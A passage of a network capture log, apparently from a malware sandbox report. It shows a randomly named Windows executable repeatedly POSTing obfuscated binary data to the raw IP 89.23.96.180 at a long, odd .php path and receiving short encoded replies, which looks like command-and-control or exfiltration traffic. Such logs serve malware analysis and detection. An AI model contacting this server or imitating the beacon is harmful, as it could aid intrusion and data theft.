                                                                                  Dec 21, 2024 10:03:10.140436888 CET2536OUTData Raw: 5d 56 46 53 5d 5f 52 52 55 5e 55 5a 54 5c 50 54 57 5d 5c 58 52 51 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]VFS]_RRU^UZT\PTW]\XRQQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-"#&[9W*"9^./,^$.&#:%!6U('+_?[+)%!_.#Q,
                                                                                  Dec 21, 2024 10:03:11.164343119 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:11.405324936 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.54985889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:11.647213936 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:11.999799967 CET2536OUTData Raw: 58 5e 43 5e 5d 59 52 55 55 5e 55 5a 54 5c 50 57 57 5e 5c 5c 52 52 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X^C^]YRUU^UZT\PWW^\\RRQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :?%?1^,,$^',;:75\1?<==5!_.#Q,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.54985989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:12.589409113 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:12.937417030 CET2112OUTData Raw: 5d 51 43 57 5d 5c 57 54 55 5e 55 5a 54 5e 50 54 57 5c 5c 5e 52 5f 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QCW]\WTU^UZT^PTW\\^R_Q^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9<R$.!P=9_9/3%?-6 <5%2.W(4+^(,^*%!_.#Q,2
                                                                                  Dec 21, 2024 10:03:13.966227055 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:14.200320005 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 56 21 38 2d 1f 28 2a 3c 01 3d 2c 2e 51 3d 58 36 5e 3b 32 20 03 22 02 2e 10 29 2d 23 13 26 2e 33 13 23 3a 32 00 21 01 20 02 29 21 2e 58 01 1e 21 43 37 1d 31 53 30 3f 2f 57 2a 37 32 5a 28 3e 32 58 24 2c 2b 56 26 2a 3f 00 3f 2a 20 13 27 2e 3d 05 2f 06 20 01 3c 00 2b 0d 30 1c 2b 51 03 1e 26 11 24 2f 3f 1e 25 33 21 59 24 2d 21 15 37 2e 30 0a 3d 01 2b 57 21 2b 0c 5f 2c 17 24 58 29 2d 00 10 3e 28 32 59 27 2c 2c 0d 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989V!8-(*<=,.Q=X6^;2 ".)-#&.3#:2! )!.X!C71S0?/W*72Z(>2X$,+V&*??* '.=/ <+0+Q&$/?%3!Y$-!7.0=+W!+_,$X)->(2Y',,&#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.54986089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:12.732861996 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:13.077872038 CET2536OUTData Raw: 58 51 43 56 58 5c 57 54 55 5e 55 5a 54 53 50 54 57 5e 5c 5f 52 56 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQCVX\WTU^UZTSPTW^\_RVQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#- 1>=W)-?/0?-%#2.T<'8(8Z*!_.#Q,
                                                                                  Dec 21, 2024 10:03:14.110999107 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:14.345910072 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.54986689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:14.587723017 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:14.937371969 CET2536OUTData Raw: 58 51 46 50 58 5a 52 57 55 5e 55 5a 54 5f 50 51 57 5e 5c 5d 52 56 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQFPXZRWU^UZT_PQW^\]RVQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ ,!3%-?!&,?'<R.5S#?5&T!?$]<-,)5!_.#Q,6
                                                                                  Dec 21, 2024 10:03:15.964498997 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:16.200102091 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.54987289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:16.450193882 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:16.796677113 CET2536OUTData Raw: 58 57 43 52 5d 5d 52 53 55 5e 55 5a 54 5e 50 56 57 5f 5c 58 52 56 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XWCR]]RSU^UZT^PVW_\XRVQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ E-$-=>!].<<]$U9-Q",6116*'?+=!_.#Q,2
                                                                                  Dec 21, 2024 10:03:17.826412916 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:18.060036898 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.54987889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:18.304194927 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2528
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:18.656219959 CET2528OUTData Raw: 58 5e 43 5e 5d 5b 57 56 55 5e 55 5a 54 5b 50 55 57 5d 5c 58 52 55 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X^C^][WVU^UZT[PUW]\XRUQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :2$2.?"*.<<$,3-(7<*'2*T*';?>+*!_.#Q,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.54987989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:19.323671103 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2084
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:19.671624899 CET2084OUTData Raw: 5d 54 43 51 5d 5e 52 50 55 5e 55 5a 54 5f 50 57 57 5b 5c 5c 52 5e 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TCQ]^RPU^UZT_PWW[\\R^Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:($>!>9[-,3%?#9;>"/5Z'2%<#\?[*5!_.#Q,6
                                                                                  Dec 21, 2024 10:03:20.702681065 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:20.936233044 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1e 20 38 35 56 3f 04 28 02 3e 11 32 1d 2b 3d 39 04 2f 1c 30 05 21 05 2d 06 29 04 27 10 33 3e 37 5a 21 14 29 5a 22 11 3f 5a 3e 0b 2e 58 01 1e 22 1b 21 23 2d 52 33 01 37 1e 3e 37 2a 17 28 10 22 10 26 3f 33 52 31 03 37 07 28 03 24 1c 26 3e 3d 05 2d 2c 33 10 3f 10 20 50 33 26 2b 51 03 1e 26 1f 32 02 2b 56 24 33 35 58 32 3d 21 1b 37 3d 2b 57 3e 38 05 52 20 2b 36 19 2c 5f 38 5c 3f 3e 3d 01 2b 2b 32 5a 27 02 28 09 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989 85V?(>2+=9/0!-)'3>7Z!)Z"?Z>.X"!#-R37>7*("&?3R17($&>=-,3? P3&+Q&2+V$35X2=!7=+W>8R +6,_8\?>=++2Z'($.#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.54988089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:19.446525097 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:19.796644926 CET2532OUTData Raw: 58 54 43 5e 5d 59 52 50 55 5e 55 5a 54 5b 50 56 57 5c 5c 5a 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XTC^]YRPU^UZT[PVW\\ZRRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#,!3%&=:<]3$T.- 91.<B?<$_)%!_.#Q,*
                                                                                  Dec 21, 2024 10:03:20.822717905 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:21.056458950 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.54988689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:21.304965019 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:21.656048059 CET2536OUTData Raw: 58 56 43 56 58 5d 52 55 55 5e 55 5a 54 59 50 5d 57 5a 5c 5b 52 51 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XVCVX]RUU^UZTYP]WZ\[RQQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B.W$&[=>"&-#',S:)R4!\&2+B<?/)!_.#Q,.
                                                                                  Dec 21, 2024 10:03:22.681952953 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:22.916294098 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.54989289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:23.181540012 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:23.531157970 CET2536OUTData Raw: 58 5f 43 54 58 5c 57 51 55 5e 55 5a 54 5d 50 56 57 5b 5c 5d 52 51 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CTX\WQU^UZT]PVW[\]RQQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.!0V&**"=^./$$/-"4<*'"?4?=!_.#Q,>
                                                                                  Dec 21, 2024 10:03:24.572820902 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:24.792654037 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.54989889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:25.037494898 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:25.391743898 CET2536OUTData Raw: 58 57 43 57 58 5d 57 57 55 5e 55 5a 54 5e 50 57 57 5e 5c 5d 52 56 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XWCWX]WWU^UZT^PWW^\]RVQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9R%-Q*!.900<<:4Y5]2"T(7(<=+)!_.#Q,2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.54989989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:26.058182001 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:26.406065941 CET2112OUTData Raw: 5d 54 46 57 5d 5d 57 57 55 5e 55 5a 54 5f 50 5c 57 52 5c 5b 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TFW]]WWU^UZT_P\WR\[RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9"'2W*-^-$]3$-(9#:16T+Z?^+%!_.#Q,6
                                                                                  Dec 21, 2024 10:03:27.438586950 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:27.672333002 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
